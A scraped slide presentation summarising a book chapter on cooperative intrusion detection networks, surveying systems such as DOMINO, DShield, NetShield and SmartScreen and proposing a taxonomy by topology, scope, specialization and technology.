Survey
* Your assessment is very important for improving the workof artificial intelligence, which forms the content of this project
* Your assessment is very important for improving the workof artificial intelligence, which forms the content of this project
Recursive InterNetwork Architecture (RINA) wikipedia , lookup
Storm botnet wikipedia , lookup
Network tap wikipedia , lookup
Deep packet inspection wikipedia , lookup
Cracking of wireless networks wikipedia , lookup
Airborne Networking wikipedia , lookup
List of wireless community networks by region wikipedia , lookup
Distributed firewall wikipedia , lookup
Chapter 9: Cooperation in Intrusion Detection Networks Authors: Carol Fung and Raouf Boutaba Editors: M. S. Obaidat and S. Misra Jon Wiley & Sons publishing Network Intrusions • Unwanted traffic or computer activities that may be malicious and destructive – Denial of Service – Identity theft – Spam mails • Single-host intrusion • Cooperative attacks Intrusion Detection Systems • Designed to monitor network traffic or computer activities and alert administrators for suspicious intrusions – Signature-based and anomaly-based – Host-based and network-based Figure 1. An example of host-based IDS and Network-based IDS Cooperative IDS • IDSs use collective information from others to make more accurate intrusion detection • Several features of CIDN – Topology – Cooperation Scope – Specialization – Cooperation Technology Cooperation Technology • Data Correlation • Trust Management • Load balance IDN Topology Scope Specialization Technology and algorithm Indra Distributed Local Worm - DOMINO Decentralized Hybrid Worm - DShield Centralized Global General Data Correlation NetShield Distributed Global Worm Load-balancing Gossip Distributed Local Worm - Worminator - Global Worm - ABDIAS Decentralized Hybrid General Trust Management CRIM Centralized Local General Data Correlation HBCIDS Distributed Global General Trust Management ALPACAS Distributed Global Spam Load-balancing CDDHT Decentralized Local General - SmartScreen Centralized Global Phishing - FFCIDN Centralized Global Botnet Data correlation Table 1. Classification of Cooperative Intrusion Detection Networks Indra • A early proposal on Cooperative intrusion detection • Cooperation nodes take proactive approach to share black list with others DOMINO • Monitor internet outbreaks for large-scale networks • Nodes are organized hierarchically • Different roles are assigned to nodes Dshield • A centralized firewall log correlation system • Data is from the SANS internet storm center • Not a real time analysis system • Data payload is removed for privacy concern NetShield • A fully distributed system to monitor epidemic worm and DoS attacks • The DHT Chord P2P system is used to load-balance the participating nodes • Alarm is triggered if the local prevalence of a content block exceeds a threshold • Only works on worms with fixed attacking traces, not work on polymorphic worms Gossip-based Intrusion Detection • A local epidemic worm monitoring system • A local detector raises a alert when the number of newly created connections exceeds a threshold • A Bayesian network analysis system is used to correlate and aggregate alerts ABDIAS • • • • Agent-based Distributed alert system IDSs are grouped into communities Intra-community/inter-community communication A Bayesian network system is used to make decisions CRIM • A centralized system to collect alerts from participating IDSs • Alert correlation rules are generated by humans offline • New rules are used to detect global-wide intrusions Host-based CIDS • A cooperative intrusion system where IDSs share detection experience with others • Alerts from one host is sent to neighbors for analysis • Feedback is aggregated based on the trust-worthiness of the neighbor • Trust values are updated after every interaction experience ALPACAS • A cooperative spam filtering system • Preserve the privacy of the email owners • A p2p system is used for the scalability of the system • Emails are divided into feature trunks and digested into feature finger prints SmartScreen • Phsihing URL filtering system in IE8 • Allow users to report phishing websites • A centralized decision system to analyze collected data and make generate the blacklist • Users browsing a phishing site will be warned by SmartScreen FFCIDN • A collaborative intrusion detection network to detect fastflux botnet • Observe the number of unique IP addresses a domain has. • A threshold is derived to decide whether the domain is a fastflux phishing domain Open Challenges • Privacy of the exchanged information • Incentive of IDS cooperation • Botnet detection and removal Conclusion • CIDNs use collective information from participants to achieve higher intrusion detection accuracy • A taxonomy to categorize different CIDNs – Four features are proposed for the taxonomy • The future challenges include how to encourage participation and provide privacy for data-sharing among IDSs